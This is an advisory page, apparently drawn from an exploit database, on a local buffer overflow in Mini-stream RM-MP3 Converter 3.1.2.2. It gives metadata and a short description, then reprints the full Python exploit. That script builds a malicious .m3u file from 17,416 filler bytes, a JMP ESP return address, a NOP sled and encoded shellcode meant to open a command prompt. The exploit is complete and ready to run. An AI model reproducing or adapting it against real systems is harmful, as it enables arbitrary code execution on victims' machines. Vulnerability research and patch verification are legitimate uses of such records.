Mini-stream RM-MP3 Converter? V 3.1.2.2 Local Buffer OverFlow

vendor:

RM-MP3 Converter

by:

[SkY-NeT SySteMs]

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: RM-MP3 Converter

Affected Version From: 3.1.2.2

Affected Version To: 3.1.2.2

Patch Exists: Yes

Related CWE: N/A

CPE: mini-stream.net/rm-to-mp3-converter

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

Unknown

Mini-stream RM-MP3 Converter? V 3.1.2.2 Local Buffer OverFlow

Mini-stream RM-MP3 Converter? V 3.1.2.2 is vulnerable to a local buffer overflow vulnerability. An attacker can exploit this vulnerability by crafting a malicious .m3u file with a specially crafted header and a payload of 17416 bytes of A characters followed by a return address of 7C874413. This will cause the program to execute the payload, which is a shellcode that will open a command prompt.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title : Mini-stream RM-MP3 Converter� V 3.1.2.2 Local Buffer
OverFlow
# Author : [SkY-NeT SySteMs]
# Software Link : [http://mini-stream.net/rm-to-mp3-converter/download/]
# Version : [3.1.2.2]
# Tested on : [Xp Sp 2]
# Category : Local
# Code : Python
# Email : [skynet-systems@hotmail.il.co]
# WebSite : [http://sskynetsystems.blogspot.com/]


# !/usr/bin/python

import os,sys

header= "http://."
junk= "\x41" * 17416 # [A]
ESP = "\x13\x44\x87\x7C" # 7C874413 FFE4 JMP ESP
NOPS = "\x90" * 16

ShellCode =(
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" 
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" 
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" 
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" 
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" 
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" 
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd"
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f"
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a"
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" 
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35"
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" 
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" 
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" 
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" 
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce")
file = open("test.m3u","w")
file.write(header+junk+ESP+NOPS+ShellCode)
file.close()